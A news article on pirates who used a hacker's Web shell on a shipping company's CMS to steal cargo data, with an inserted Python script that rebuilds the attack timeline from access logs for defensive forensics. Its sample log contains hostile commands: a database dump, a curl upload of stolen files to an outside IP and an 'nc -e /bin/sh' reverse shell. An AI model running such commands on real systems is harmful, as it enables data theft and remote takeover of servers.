Sea pirates hire hacker to break into shipping company's CMS

Mar 2, 2016 22:05 GMT  ·  By

A curious case reported by Verizon's RISK Team shows that even lowly sea pirates chasing cargo ships in worn-out dinghies with old Kalashnikovs are resorting to hacking to boost their profits.

As described in Verizon's most recent Data Breach Digest, a collection of cyber-security case studies the company's RISK Team helped investigate and resolve over the past year, a reputable global shipping conglomerate started having peculiar problems with sea pirates.

The shipping company told Verizon that pirates were boarding its vessels at regular intervals, equipped with a barcode reader (and weapons, of course), searching for specific crates, emptying them of high-value cargo, and making off with the loot within minutes of launching each attack.

All of this made the shipping company suspect something was off, and it hired the RISK Team to track down the source of a possible leak, which it suspected to be either an undiscovered data breach or an insider operating from within the company's headquarters.

The sea pirates were working together with a hacker

The RISK Team quickly traced the problem to the firm's outdated, custom-built CMS, whose file-upload script performed no validation on what it accepted. As Verizon explained, a hacker, either a member of the pirate group or hired by it, used that form to upload a Web shell, which the script saved straight into a Web-accessible directory.

To make things worse, the Web server was configured to execute scripts in that folder, so the hacker could pass commands to the Web shell as URL parameters and have them run on the server with no further exploit chaining.

Through the Web shell the hacker reached the shipping firm's database and pulled down bills of lading (BoLs), future shipment schedules, and ship routes, so the pirates could time their attacks and know which crates held valuable cargo.

The hacker lacked talent, was easily discovered

Fortunately, the hacker wasn't that skilled. Verizon says the attacker used a Web shell that did not support SSL and passed every command as a plaintext URL parameter, so each one was recorded in the Web server's access log. (A Web server logs the request URL after TLS has been terminated, so the commands would have landed in the access log either way; what the missing encryption cost the attacker was cover against network monitoring.)

From those logs the RISK Team was able to reconstruct a full timeline of the hacker's actions, down to which records were viewed and where the files were sent.

"These threat actors, while given points for creativity, were clearly not highly skilled," the RISK Team explains. "For instance, we found numerous mistyped commands and observed that the threat actors constantly struggled to interact with the compromised servers."
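The log-driven reconstruction described above, as an added Python example (the sample access-log lines are constructed and are not data from the Verizon report; the shell path /uploads/img.php, the cmd parameter and the IP addresses are invented): it parses combined-format access-log lines, keeps the requests that hit the Web shell, decodes the command from the query string, and orders them into a timeline, together with the source IPs and any hosts referenced inside the commands.

```python
import re
from datetime import datetime
from typing import Dict, List, Optional, Set
from urllib.parse import parse_qs, urlsplit

# Apache/nginx "combined" access-log format. The request line is logged after
# TLS termination, so query-string commands show up here with or without HTTPS.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Constructed sample log. One benign request, then a Web-shell session:
# recon, a database dump, a mistyped command, an upload to an outside host,
# and a failed reverse-shell attempt.
SAMPLE_LOG = """\
198.51.100.7 - - [12/Oct/2015:09:13:51 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.45 - - [12/Oct/2015:09:14:02 +0000] "GET /uploads/img.php?cmd=whoami HTTP/1.1" 200 17 "-" "Mozilla/5.0"
203.0.113.45 - - [12/Oct/2015:09:14:30 +0000] "GET /uploads/img.php?cmd=mysql+-u+cms+-pSecret+-e+%22select+*+from+bills_of_lading%22 HTTP/1.1" 200 48211 "-" "Mozilla/5.0"
203.0.113.45 - - [12/Oct/2015:09:15:10 +0000] "GET /uploads/img.php?cmd=sl+-la+%2Fvar%2Fwww HTTP/1.1" 200 41 "-" "Mozilla/5.0"
203.0.113.45 - - [12/Oct/2015:09:16:44 +0000] "GET /uploads/img.php?cmd=curl+-F+file%3D%40bol.csv+http%3A%2F%2F198.51.100.200%2Fup HTTP/1.1" 200 2 "-" "Mozilla/5.0"
203.0.113.45 - - [12/Oct/2015:09:18:03 +0000] "GET /uploads/img.php?cmd=nc+-e+%2Fbin%2Fsh+198.51.100.200+4444 HTTP/1.1" 500 0 "-" "Mozilla/5.0"
"""

IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def parse_line(line: str) -> Optional[Dict]:
    """Split one combined-format line into its fields; None if it doesn't parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec


def shell_timeline(log: str, shell_path: str, param: str = "cmd") -> List[Dict]:
    """Every request to the Web shell with its command URL-decoded, in time order."""
    events = []
    for line in log.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        url = urlsplit(rec["target"])
        if url.path != shell_path:
            continue
        cmds = parse_qs(url.query).get(param)
        if not cmds:
            continue
        events.append({"ts": rec["ts"], "ip": rec["ip"],
                       "cmd": cmds[0], "status": rec["status"]})
    events.sort(key=lambda e: e["ts"])
    return events


def attacker_ips(events: List[Dict]) -> List[str]:
    """Source addresses that drove the shell (the 'home IP' in the article's case)."""
    return sorted({e["ip"] for e in events})


def outbound_hosts(events: List[Dict]) -> Set[str]:
    """IPs named inside commands: where data was sent or a reverse shell was aimed."""
    hosts: Set[str] = set()
    for e in events:
        hosts.update(IP_RE.findall(e["cmd"]))
    return hosts


def format_timeline(events: List[Dict]) -> List[str]:
    return [f"{e['ts'].isoformat()} {e['ip']} HTTP {e['status']}: {e['cmd']}"
            for e in events]


if __name__ == "__main__":
    timeline = shell_timeline(SAMPLE_LOG, "/uploads/img.php")
    print("\n".join(format_timeline(timeline)))
    print("attacker IPs:", attacker_ips(timeline))
    print("outbound hosts:", outbound_hosts(timeline))
```

On a real investigation the shell path comes from the upload-directory listing rather than being known up front; a practical first pass is to run the same parser over the whole log and group by request path, looking for scripts under the upload directory that receive a query parameter no legitimate page uses.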

Hacker "forgot" to use a proxy/VPN to hide his real IP address

"The threat actors tried, albeit in vain, to establish a reverse shell to directly interact with one of the compromised hosts. Try as they might, the threat actors were unable to move laterally," the security researchers noted, adding that the hacker also tried and failed to escalate access to other company servers.

Those attempts failed even though the attacker had harvested various accounts and passwords along the way. In another sign of limited tradecraft, the attacker connected to the Web shell directly, without a proxy or VPN, exposing a home IP address.

With all this in hand, Verizon helped the company block the hacker's IP, remove the Web shell, take the compromised server offline, reset passwords for all compromised accounts, and upgrade the CMS.